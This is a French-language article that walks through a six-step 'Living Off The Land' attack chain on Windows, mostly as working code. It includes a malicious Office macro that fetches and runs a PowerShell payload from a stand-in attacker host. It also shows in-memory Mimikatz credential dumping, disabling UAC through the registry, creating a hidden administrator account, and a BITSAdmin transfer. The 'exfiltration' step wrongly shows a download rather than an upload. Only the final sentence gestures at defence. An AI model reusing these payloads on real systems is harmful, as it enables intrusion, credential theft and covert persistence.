Techniques Avancées de Living Off The Land (LOTL)
Profondeur et discrétion : découvrez comment orchestrer des attaques LOTL sophistiquées avec des scripts et payloads conçus pour échapper à la détection.
Étape 1: Reconnaissance Approfondie
L'attaque commence par une reconnaissance minutieuse, utilisant des scripts avancés pour extraire précisément les informations système critiques.
# PowerShell pour extraire des détails de configuration systèmeGet-WmiObject -Class Win32_ComputerSystem | Select-Object -Property Name,Domain,Manufacturer,Model,NumberOfProcessors,TotalPhysicalMemory Cette commande PowerShell permet à l'attaquant de comprendre l'environnement cible et de planifier des attaques ciblées en fonction du matériel et de la configuration logicielle.
Étape 2: Déploiement de Payloads Avancés
Le premier accès est souvent obtenu via des techniques de phishing sophistiquées, incorporant des documents avec des macros malveillantes qui exécutent des payloads obfusqués.
# Macro VBA obfusquée pour exécuter un script PowerShellSub AutoOpen() Dim str As String str = "powershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://malicious.url/invoke-script'))" Shell str, vbHideEnd Sub Cette macro VBA est déclenchée lorsque le document est ouvert, exécutant discrètement un script PowerShell téléchargé depuis un serveur contrôlé par l'attaquant.
Étape 3: Élévation de Privilège et Exploitation de Configurations
Exploitation de configurations système faibles en utilisant des commandes natives pour modifier les politiques de groupe ou les registres, facilitant une élévation de privilège non surveillée.
# PowerShell pour modifier les registres et désactiver l'UACSet-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0 Cette commande réduit les mesures de sécurité de l'UAC, permettant des actions plus intrusives sans générer de prompts de sécurité.
Étape 4: Mouvement Latéral Sophistiqué
Utilisation de Mimikatz exécuté via PowerShell pour extraire des credentials et les utiliser pour accéder à d'autres systèmes sur le réseau.
# Exécuter Mimikatz depuis PowerShellIEX (New-Object Net.WebClient).DownloadString('http://malicious.url/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds Ce script charge et exécute Mimikatz en mémoire, ce qui lui permet de capturer des mots de passe et des tokens sans laisser de trace sur le disque dur.
Étape 5: Maintien de la Persistance
Création de comptes administrateurs cachés et inscription de scripts malveillants dans les tâches planifiées pour assurer une persistance indétectable.
# Ajouter un utilisateur administrateur discretnet user /add [username] [password]net localgroup administrators [username] /add Ces commandes créent un nouvel utilisateur et l'ajoutent au groupe des administrateurs, offrant un accès persistant à l'attaquant.
Étape 6: Exfiltration Discrète de Données
Exfiltration des données capturées en utilisant des commandes Windows intégrées pour masquer le transfert de données sous des activités réseau légitimes.
# Utiliser BITSAdmin pour transférer des fichiers discrètementbitsadmin /transfer myDownloadJob /download /priority normal http://malicious.url/data.txt C:\Users\Public\Downloads\data.txt Cette commande utilise BITSAdmin, un gestionnaire de transfert d'emplois en arrière-plan, pour télécharger discrètement des données depuis le serveur de l'attaquant.
Les attaques LOTL exploitent astucieusement les outils systèmes pour mener des opérations furtives. La compréhension de ces techniques avancées est cruciale pour renforcer les défenses et déjouer les menaces sophistiquées.